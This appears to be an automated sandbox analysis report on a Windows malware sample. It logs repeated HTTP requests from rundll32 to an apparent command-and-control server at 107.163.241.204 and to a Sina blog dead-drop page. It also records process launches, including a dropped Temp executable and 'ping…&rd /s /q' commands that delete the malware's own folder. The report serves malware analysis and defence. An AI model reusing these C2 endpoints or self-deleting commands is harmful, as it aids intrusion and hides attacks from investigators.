                                                      140192.168.2.953421107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:43.693208933 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      141192.168.2.953422202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:43.694067955 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:45.261578083 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:45 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      142192.168.2.955505107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:46.585161924 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      143192.168.2.955526107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:46.710813999 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      144192.168.2.955962202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:47.209956884 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      145192.168.2.956247107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:47.615381956 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      146192.168.2.956326107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:47.735153913 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      147192.168.2.956327202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:47.735380888 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:49.296241045 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:49 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      148192.168.2.957951107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:49.856829882 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      149192.168.2.958061107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:49.975644112 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.949834202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:01 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.949927202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:09 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.949975202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:13 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.950022202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:17 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.950072202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:21 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.950122202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:25 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.950172202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:29 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.950226202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:33 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.950283202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:37 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.950474202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:49 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.950561202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:53 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.950660202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:24:57 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.950784202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:25:02 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.950936202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:25:06 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.951144202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:25:10 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.951381202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:25:14 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.951633202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:25:18 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.951858202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:25:22 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.954674202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:25:26 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.957802202.108.0.524437556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-11 15:25:30 UTC142OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:10:23:42
                                                      Start date:11/12/2024
                                                      Path:C:\Users\user\Desktop\XgijTrY6No.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\XgijTrY6No.exe"
                                                      Imagebase:0x400000
                                                      File size:87'284 bytes
                                                      MD5 hash:FC2914434D6121F5E04E8E70E235C239
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:10:23:42
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"
                                                      Imagebase:0xc50000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:10:23:42
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:10:23:42
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\PING.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:ping 127.0.0.1 -n 2
                                                      Imagebase:0xd90000
                                                      File size:18'944 bytes
                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:10:23:43
                                                      Start date:11/12/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\mszcy.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"
                                                      Imagebase:0x400000
                                                      File size:87'764 bytes
                                                      MD5 hash:847CCE07E3BF3D974D1D089F5028E95F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:10:23:43
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:c:\windows\system32\rundll32.exe "c:\ftelcs\rjqzr.dll",QueryPluginInterface C:\Users\user\AppData\Local\Temp\mszcy.exe
                                                      Imagebase:0xfd0000
                                                      File size:61'440 bytes
                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:8
                                                      Start time:10:23:55
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\windows\SysWOW64\rundll32.exe" "c:\ftelcs\rjqzr.dll",QueryPluginInterface
                                                      Imagebase:0xfd0000
                                                      File size:61'440 bytes
                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:10:23:56
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs"
                                                      Imagebase:0xc50000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:10:23:56
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:10:23:56
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\PING.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:ping 127.0.0.1 -n 3
                                                      Imagebase:0xd90000
                                                      File size:18'944 bytes
                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:10:24:04
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\windows\SysWOW64\rundll32.exe" "c:\ftelcs\rjqzr.dll",QueryPluginInterface
                                                      Imagebase:0xfd0000
                                                      File size:61'440 bytes
                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:10:24:04
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs"
                                                      Imagebase:0xc50000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:10:24:04
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:10:24:04
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\PING.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:ping 127.0.0.1 -n 3
                                                      Imagebase:0xd90000
                                                      File size:18'944 bytes
                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:12%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:15.2%
                                                        Total number of Nodes:276
                                                        Total number of Limit Nodes:7
                                                        execution_graph 794 401d42 799 401d4c 794->799 805 402b0b 799->805 802 402ec2 809 402e96 802->809 804 401d63 806 401d47 805->806 807 402b1f 805->807 806->802 808 402b5a 3 API calls 807->808 808->806 810 402eab __dllonexit 809->810 811 402e9f _onexit 809->811 810->804 811->804 929 401ec3 930 401cec ctype 7 API calls 929->930 931 401ecb 930->931 932 401ed2 #825 931->932 933 401ed9 931->933 932->933 812 403244 815 4025eb #825 812->815 814 40324c 815->814 873 401704 878 401720 873->878 879 402dd4 #815 878->879 816 401145 #6453 817 401157 DeleteObject 816->817 818 40115e 816->818 817->818 1008 402588 SendMessageA 1009 4025c4 1008->1009 1010 4025a4 #3286 1008->1010 1010->1009 1011 4025b4 1010->1011 1012 401160 22 API calls 1011->1012 1012->1009 819 401349 820 40140f 819->820 821 40135e SendMessageA SendMessageA SendMessageA 819->821 822 4013a5 SendMessageA SendMessageA SendMessageA 821->822 823 4013d9 821->823 822->823 823->820 824 4013df SendMessageA SendMessageA SendMessageA 823->824 824->820 934 4016c9 935 402b48 934->935 936 402b59 935->936 937 402baf WSACleanup 935->937 1013 40168a #656 1014 4016a0 1013->1014 1015 401699 #825 1013->1015 1015->1014 785 402b0b 786 402b26 785->786 787 402b1f 785->787 789 402b5a WSAStartup 787->789 790 402ba3 WSAGetLastError 789->790 791 402b7c 789->791 793 402b92 790->793 792 402b9d WSACleanup 791->792 791->793 792->790 793->786 1016 40108c 1021 4010a8 _EH_prolog #656 #656 #656 #641 1016->1021 1018 401094 1019 4010a2 1018->1019 1020 40109b #825 1018->1020 1020->1019 1021->1018 938 4015cd #2379 939 4015e6 938->939 940 401607 939->940 941 4015f8 #4299 939->941 942 401629 940->942 944 401616 #4299 940->944 941->940 943 40164a 942->943 945 401638 #4299 942->945 944->942 945->943 880 401e0f #2370 946 4025cf 951 402226 EnterCriticalSection SendMessageA 946->951 948 4025d7 958 401160 _EH_prolog #537 #537 #540 948->958 950 4025e9 952 402290 LeaveCriticalSection 951->952 953 402259 951->953 952->948 954 40225a #3286 953->954 955 40227c SendMessageA 954->955 956 40226c #825 #825 954->956 955->954 957 40228f 955->957 956->955 957->952 959 4011b4 #2818 958->959 960 4011ea #6199 #2614 958->960 961 4011da #939 959->961 962 4011cd #941 959->962 973 40120e 960->973 961->959 961->960 962->961 963 4012f8 #6199 #6199 #800 #800 #800 963->950 964 401233 #2818 965 401261 #939 964->965 966 401254 #941 964->966 968 401273 965->968 969 401295 #2818 965->969 966->965 967 4012cc #941 #941 967->973 968->969 971 40127e #2818 968->971 972 4012a5 #939 969->972 970 4012f5 970->963 971->972 972->973 973->963 973->964 973->967 973->970 825 401650 #4476 881 402614 #693 882 402623 #825 881->882 883 40262a 881->883 882->883 884 401f19 _EH_prolog #4710 GetSystemMenu #2863 885 401f95 SendMessageA SendMessageA #823 884->885 886 401f48 #540 #4160 884->886 889 401fe4 #2086 885->889 890 401fdc 885->890 887 401f87 #800 886->887 888 401f69 AppendMenuA AppendMenuA 886->888 887->885 888->887 893 4024df 5 API calls 889->893 895 401000 6 API calls 890->895 894 40200a 11 API calls 893->894 895->889 974 4020da _EH_prolog 975 4020f4 974->975 976 402125 #2379 974->976 980 401d6f _EH_prolog #324 #540 #860 975->980 977 40212a 976->977 979 4020fc #2514 #800 #641 979->977 980->979 981 4021da 982 402df8 #4853 981->982 983 401edf #2302 #2302 984 4016df #561 __p___argv DeleteFileA 985 4021df 986 402df2 #4376 985->986 1022 40229f _EH_prolog 1028 4028b1 1022->1028 1025 4023f2 #823 memcpy #6007 1027 402442 LeaveCriticalSection #800 1025->1027 1041 402883 1028->1041 1031 402acc sprintf sprintf sprintf 1033 4022fe 13 API calls 1031->1033 1032 40297d 1034 402a13 strcpy htons htons 1032->1034 1035 402986 1032->1035 1033->1025 1038 402a44 sprintf htonl 1034->1038 1036 4029b2 6 API calls 1035->1036 1037 40298b sprintf sprintf 1035->1037 1036->1033 1037->1033 1040 402a80 sprintf sprintf memcpy 1038->1040 1040->1033 1042 40288a strncpy inet_ntoa strncpy inet_ntoa strncpy 1041->1042 1042->1031 1042->1032 703 402f22 __set_app_type __p__fmode __p__commode 704 402f91 703->704 705 402fa5 704->705 706 402f99 __setusermatherr 704->706 715 403092 _controlfp 705->715 706->705 708 402faa _initterm __getmainargs _initterm 709 402ffe GetStartupInfoA 708->709 711 403032 GetModuleHandleA 709->711 716 4030ae #1576 711->716 714 403056 exit _XcptFilter 715->708 716->714 987 4021e4 #6453 989 4021fd 987->989 988 402226 7 API calls 990 402216 DeleteCriticalSection 988->990 989->988 902 401725 903 40172a 902->903 904 402ec2 2 API calls 903->904 905 401743 904->905 1043 4016a6 1048 4016b0 1043->1048 1046 402ec2 2 API calls 1047 4016c7 1046->1047 1049 402b0b 3 API calls 1048->1049 1050 4016ab 1049->1050 1050->1046 717 401c6a _EH_prolog #1134 729 401e2a _EH_prolog #324 #567 #567 717->729 719 401c92 __p___argv 720 401cb3 719->720 721 401cae 719->721 741 401a2d FindResourceA 720->741 732 401867 #823 memset __p___argv 721->732 725 401cc4 #2514 750 401cec _EH_prolog 725->750 726 401cbc ExitProcess 728 401cde 753 40265d 729->753 731 401e80 #1168 #1146 LoadIconA 731->719 754 4017b2 732->754 735 4018d5 762 40174f GetTickCount srand rand 735->762 736 4018b5 __p___argv 737 4017b2 5 API calls 736->737 739 4018c9 Sleep 737->739 739->735 739->736 742 401a52 LoadResource 741->742 744 401a60 741->744 743 401a67 SizeofResource LockResource memcpy 742->743 742->744 745 401a98 743->745 744->725 744->726 746 40174f 4 API calls 745->746 747 401b15 